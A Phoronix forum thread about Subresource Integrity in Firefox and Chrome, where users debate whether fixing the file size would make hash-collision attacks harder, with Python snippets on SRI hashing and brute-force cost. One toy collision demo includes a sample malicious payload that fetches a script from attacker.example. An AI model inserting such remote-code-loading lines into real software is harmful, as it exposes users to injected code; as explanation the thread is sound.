Subresource Integrity Support Ready For Firefox 43, Chrome 45

  • Subresource Integrity Support Ready For Firefox 43, Chrome 45

    Phoronix: Subresource Integrity Support Ready For Firefox 43, Chrome 45

    The upcoming releases of the Mozilla Firefox and Google Chrome web browsers include support for the W3C Subresource Integrity (SRI) specification...

    http://www.phoronix.com/scan.php?pag...Chrome-SRI-W3C
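    For reference, an SRI `integrity` attribute is just the digest algorithm's name plus a base64-encoded hash of the resource's exact bytes. A minimal Python sketch of generating one (the script content and filename below are made up for illustration; sha384 is one of the algorithms the spec allows):

    ```python
    import base64
    import hashlib

    def sri_hash(data: bytes, alg: str = "sha384") -> str:
        """Build an SRI integrity value of the form '<alg>-<base64 digest>'."""
        digest = hashlib.new(alg, data).digest()
        return f"{alg}-{base64.b64encode(digest).decode('ascii')}"

    # Hypothetical script content; in practice you hash the exact bytes served.
    script = b"console.log('hello');"
    print(f'<script src="app.js" integrity="{sri_hash(script)}" '
          f'crossorigin="anonymous"></script>')
    ```

    The browser refetches the resource, hashes what it actually received, and refuses to execute it if the digest doesn't match the attribute.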

  • #2
    That's a very cool idea. However, I am surprised the spec doesn't include both the hash of the payload and also the size. From what little I understand, it's easier to match a target hash value if you can use any size you want.

    So say someone has 20,865 bytes of data and the hash (for the sake of this example) is 123456789. If the specification includes the hash and the size, then an attacker that wants to substitute a malicious value has to find some other 20,865 byte input that does what the attacker wants and also hashes to 123456789.

    But if the size does not accompany the hash, the attacker can write 500 bytes of evil Javascript (that loads more evil Javascript from another site) and then try any number of bytes, from 1 to infinity, appended to his bad Javascript to match the target 123456789 hash. That's not easy, but it's orders of magnitude easier than working from a fixed size.

    https://en.wikipedia.org/wiki/Collision_attack
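    The append-padding idea above can be demonstrated on a toy scale. The sketch below truncates SHA-256 to 16 bits so the search finishes instantly; against the full 256-bit output the same loop would never terminate in practice. The "legit" and "evil" payloads are invented for illustration:

    ```python
    import hashlib

    # Toy version of the attack described above: no length constraint, so the
    # attacker appends arbitrary counter bytes until the (truncated!) hash of
    # his payload matches the target. Real SHA-256 targets are 256 bits, far
    # beyond any such search.
    legit = b"function greet() { return 'hi'; }"
    target = hashlib.sha256(legit).digest()[:2]   # truncated to 16 bits

    evil = b"fetch('https://attacker.example/payload.js')"  # hypothetical
    suffix = None
    for i in range(1 << 24):
        candidate = evil + b"//" + i.to_bytes(4, "big")     # padding hidden in a comment
        if hashlib.sha256(candidate).digest()[:2] == target:
            suffix = i
            break

    print("collision found after", suffix, "attempts")
    ```

    With a 16-bit target the expected search is about 2^16 attempts; every extra bit of hash doubles that, which is where the later replies' "practically impossible" comes from.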



    • #3
      Faking a good hash (e.g. a SHA-256) is already "practically impossible"... regardless of the file.

      Knowing the length gains you no further bonus, because if you run a collision attack you could just start with an all-zero file of the right length and count up without ever changing the length... which would still get you nowhere, because the hash's output space is too large.
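      Some back-of-the-envelope arithmetic on "the hash number space is too large", assuming a deliberately generous guessing rate (the 10^12 hashes/second figure is an assumption, not from the thread):

      ```python
      # Matching one specific SHA-256 value takes about 2**256 attempts.
      # Assume a (very generous) rate of 10**12 hashes per second:
      attempts = 2 ** 256
      rate = 10 ** 12                       # hashes per second (assumed)
      seconds_per_year = 365 * 24 * 3600
      years = attempts // rate // seconds_per_year
      print(f"about {years:.1e} years")     # on the order of 10**57 years
      ```

      For comparison, the universe is roughly 1.4 x 10^10 years old, so a 40x speedup from shorter inputs changes nothing about feasibility.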



      • #4
        As far as I understand it, the computational power required for an SHA256 calculation is dependent upon the size of the input. So if you have a 20k resource that must be matched by a 20k length fake, a potential attacker has to run SHA256 against 20k length inputs. If you have a 20k resource that can be matched by an any-length fake, an attacker can create the smallest possible hack that also pulls in its own payload of bad code and then run his SHA256 against 0.5k length inputs. In this example, he has a 40x speed advantage.
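        The per-attempt cost claim is easy to check empirically. A machine-dependent sketch using the thread's own sizes (the exact ratio will fall short of the ideal 40x because of fixed per-call overhead; treat the printed number as illustrative only):

        ```python
        import hashlib
        import timeit

        # Compare the cost of one brute-force attempt at 0.5 kB vs ~20 kB.
        small = b"\x00" * 512        # ~0.5 kB candidate
        large = b"\x00" * 20_865     # the 20,865-byte example from the thread

        t_small = timeit.timeit(lambda: hashlib.sha256(small).digest(), number=20_000)
        t_large = timeit.timeit(lambda: hashlib.sha256(large).digest(), number=20_000)
        print(f"time ratio (large/small): {t_large / t_small:.1f}x")
        ```

        So the premise here is right (longer inputs do cost more per hash); the later replies dispute only whether that speedup matters.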



        • #5
          But I've only got a superficial understanding. A 40x speed advantage may still be ten orders of magnitude (I'm pulling that number out of thin air, I have no idea) too few to make it computationally feasible to fake an input, in which case my objection isn't significant.



          • #6
            Originally posted by Michael_S View Post
            As far as I understand it, the computational power required for an SHA256 calculation is dependent upon the size of the input.
            It is dependent, in the sense that you have to run the input file sequentially through the hash algorithm. That has very little to do with the difficulty of reversing the hash. Fixing the length of the file only tells an attacker exactly the file size he should be using.



            • #7
              Originally posted by bug77 View Post

              It is dependent, in the sense that you have to run the input file sequentially through the hash algorithm. That has very little to do with the difficulty of reversing the hash. Fixing the length of the file only tells an attacker exactly the file size he should be using.
              Shouldn't the length of the file affect how many brute force attempts you can make to duplicate the hash in one second?



              • #8
                Originally posted by Michael_S View Post

                Shouldn't the length of the file affect how many brute force attempts you can make to duplicate the hash in one second?
                It doesn't matter. Assuming the hash is cryptographically secure, which we believe it is, there will never be enough computational resources to find a collision. That's the whole point. If this were something like a password-hashing function, where we were trying to find an input that generates the hash, you'd have a point; but finding two different values that hash to the same thing is just not going to happen. If every message has an equal probability of mapping to a particular output value, then the probability of any message being a collision is roughly 1/2^256. If you could enumerate that, then even things like AES 128-bit keys would start looking suspect.
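                To spell out the two different attack costs being contrasted here (the 2^128 birthday bound for a 256-bit hash is standard cryptographic background, not stated in the post):

                ```python
                # Rough expected work for each attack, in hash evaluations:
                second_preimage = 2 ** 256   # forge a file matching one SPECIFIC SHA-256 value
                any_collision = 2 ** 128     # find ANY two colliding inputs (birthday bound)
                aes128_keys = 2 ** 128       # exhausting an AES-128 keyspace, for comparison

                # Even the "easier" generic collision search costs as much as
                # brute-forcing AES-128 -- which is the comparison made above.
                print(any_collision == aes128_keys)
                ```

                And an SRI attacker faces the harder second-preimage case, since the target hash is already fixed in the page.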



                • #9
                  Originally posted by Michael_S View Post
                  Shouldn't the length of the file affect how many brute force attempts you can make to duplicate the hash in one second?
                  With most hashes (like SHA-256): no, not really.
                  Basically: you precompute as much as possible from the constant part of the file, and then iterate only on a small changing part.

                  In detail:
                  These hashes take a stream as input, which they process block by block.

                  So to brute-force something of a fixed size, one needs to:

                  1. start computing the hash.
                  2. feed into the hash all the blocks up to the fixed length, except for the last one (i.e. feed the whole file minus the last 512 bits).
                  3. freeze the current state of the hash computation.
                  4. try one random guess at the last block.
                  5. feed that block into the hash computation.
                  6. compute the final hash.
                  6.a. ...if it matches the target: we have a win.
                  6.b. ...if it doesn't, reload the state frozen in step 3 and go back to step 4.

                  (E.g.: that's how bitcoin mining is implemented).

                  File size doesn't really impact the run time that much.

                  SHA-3 might be a tiny bit more complex with its sponge function.
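                  The precompute-and-freeze loop above can be sketched with Python's hashlib, whose `copy()` method clones a hash object's internal state. The prefix size is arbitrary, and the loop trivially "finds" a known target at guess 0, just to show the mechanics:

                  ```python
                  import hashlib

                  # Steps 1-3: hash everything but the last 512-bit block once,
                  # then freeze that state.
                  prefix = b"\x00" * 20_352              # arbitrary fixed prefix
                  target = hashlib.sha256(prefix + (0).to_bytes(64, "big")).digest()

                  frozen = hashlib.sha256()
                  frozen.update(prefix)

                  # Steps 4-6: per attempt, clone the frozen state and feed only
                  # the candidate last block -- the prefix is never rehashed.
                  for guess in range(256):
                      h = frozen.copy()                  # reload frozen state (step 6.b)
                      h.update(guess.to_bytes(64, "big"))
                      if h.digest() == target:
                          print("matched at guess", guess)
                          break
                  ```

                  This is why file size barely matters: the expensive prefix hashing happens once, and each attempt only pays for one block plus finalization.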

